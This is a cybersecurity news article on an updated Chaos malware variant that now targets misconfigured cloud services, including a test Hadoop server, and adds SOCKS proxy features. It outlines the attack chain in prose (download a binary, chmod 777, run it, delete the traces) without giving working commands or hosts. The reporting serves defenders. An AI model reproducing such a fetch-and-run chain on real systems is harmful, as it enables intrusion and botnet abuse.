Cybersecurity researchers have identified a new version of the Chaos malware that is now actively targeting poorly secured cloud environments. This marks a shift from its earlier focus on routers and edge devices to more complex cloud-based infrastructure.
According to recent findings, the updated variant is taking advantage of misconfigured services, showing how attackers are adapting their tools to match modern enterprise environments.
From Edge Devices to Cloud Targets
Chaos was first observed in 2022 as a cross-platform threat capable of infecting both Windows and Linux systems. It was designed to:
- Execute remote shell commands
- Spread across systems using SSH brute-force techniques
- Deploy additional malicious modules
- Mine cryptocurrency
- Launch DDoS attacks using multiple protocols
The malware is believed to have evolved from an earlier threat known as Kaiji, which primarily targeted exposed Docker environments.
How the New Attack Works
In recent activity, researchers detected the updated Chaos variant targeting a deliberately vulnerable Hadoop server used for testing. The attack began with a crafted HTTP request that allowed the attacker to deploy a malicious application.
This application executed a chain of shell commands to:
- Download the Chaos binary from a remote server
- Change file permissions to allow full access (
chmod 777) - Run the malware
- Remove traces of the file to avoid detection
This approach helps attackers maintain stealth while quickly establishing control over the compromised system.
Connection to Previous Campaigns
The domain used to host the malware has reportedly been linked to earlier cyber operations, including phishing campaigns associated with a group known as Silver Fox. Those campaigns previously delivered decoy documents and remote access malware, suggesting possible overlap in infrastructure or tactics.
What’s New in This Variant
The latest version of Chaos introduces several changes:
- Removal of older propagation methods, such as SSH spreading and router exploitation
- Code restructuring, indicating the malware has been rewritten or heavily modified
- New SOCKS proxy functionality, allowing infected systems to route malicious traffic
This proxy feature is particularly important. It enables attackers to hide their real location by using compromised machines as intermediaries, making detection and attribution more difficult.
Why This Matters
The addition of proxy capabilities suggests that attackers are expanding how they monetize botnets. Instead of relying only on DDoS attacks or crypto mining, they can now:
- Sell proxy access
- Support anonymized cyber operations
- Provide infrastructure for other threat actors
This reflects a broader trend where botnets are evolving into multi-purpose platforms within the cybercrime ecosystem.
Final Insight
Although Chaos is not a new threat, its continued development shows how quickly cybercriminal tools can adapt. The shift toward cloud environments and proxy-based services highlights a growing risk for organizations that leave systems misconfigured or exposed.
For defenders, this is a reminder that securing cloud services and monitoring unusual activity is just as important as protecting traditional endpoints.